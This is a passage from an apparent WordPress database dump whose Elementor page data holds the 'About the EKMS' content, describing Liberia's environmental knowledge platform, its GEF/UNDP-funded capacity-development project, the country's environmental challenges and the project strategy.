tools.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and partner institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(25950,3831,'_elementor_edit_mode','builder'),(25951,3831,'_elementor_template_type','wp-page'),(25952,3831,'_elementor_version','2.7.5'),(25953,3831,'_wp_page_template','default'),(25954,3831,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\"}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width: 100%;\\\">\\n<tbody>\\n<tr>\\n<th><strong>Project Name<\\/strong><\\/th>\\n<th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n<\\/tr>\\n<tr>\\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n<td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)<\\/td>\\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<h3>B. Strategy<\\/h3>\\n<h4>B.1 Alternative Strategies<\\/h4>\\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.<\\/p>\\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project\\u2019s objective was formulated.<\\/p>\\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies \\u2013 indeed an important capacity development need that the project would help address. A related issue was the government\\u2019s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.<\\/p>\\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.<\\/p>\\n<h4>B.2 Selected Scenario<\\/h4>\\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<p style=\\\"background-color: lightgray;\\\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.<\\/p>\\n<h4>B.3 Knowledge Management<\\/h4>\\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).<\\/p>\\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.<\\/p>\\n<p>The project\\u2019s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\"}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(25956,68,'_elementor_pro_version','3.7.1'),(25960,76,'_last_editor_used_jetpack','block-editor'),(25969,419,'supports_jetpack_publicize','0'),(25970,419,'supports_jetpack_markdown','0'),(25971,419,'built_in_taxonomies_elementor_font_type','0'),(25972,419,'built_in_taxonomies_wp_theme','0'),(25973,419,'pfat_filter_archive_custom','the_content'),(25974,576,'file_upload_dir','wp'),(25975,420,'file_upload_dir','wp'),(25976,578,'file_upload_dir','wp'),(25977,578,'oembed_enabled_providers_gfycatcom','0'),(25978,578,'oembed_enabled_providers_icloudcom','0'),(25979,578,'oembed_enabled_providers_loomcom','0'),(25980,578,'oembed_enabled_providers_mesh','0'),(25981,578,'oembed_enabled_providers_odeslico','0'),(25982,578,'oembed_enabled_providers_sketchfabcom','0'),(25983,578,'oembed_enabled_providers_tiktokcom','0'),(25984,578,'oembed_enabled_providers_wistiacom','0'),(25985,578,'pick_display_format_multi','default'),(25986,578,'pick_display_format_separator',', '),(25987,3287,'document_cover_image','3545'),(25988,3287,'attached_document','3288'),(25989,3542,'_edit_lock','1629202560:38'),(25990,3541,'document_cover_image','3548'),(25991,3541,'attached_document','3542'),(25992,3834,'_elementor_edit_mode','builder'),(25993,3834,'_elementor_template_type','loop'),(25994,3834,'_elementor_version','3.4.1'),(25995,3834,'_elementor_pro_version','3.3.6'),(25996,3834,'_edit_lock','1629383395:43'),(25997,3834,'_wp_page_template','default'),(25998,3834,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(25999,3834,'_elementor_data','[{\"id\":\"97b774f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d196435\"}],\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"58e5283\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5fea59f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ef533a9\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"18398f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"ec82dac\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"f3da858\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"align\":\"left\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"766d5fb\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"c35d24b\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"resource_category\",\"text_prefix\":\"Category:\",\"show_icon\":\"none\"},{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"796caf9\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Uploaded:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"b3c26a1\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Ayear%22%2C%22before%22%3A%22Year%20Published%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" 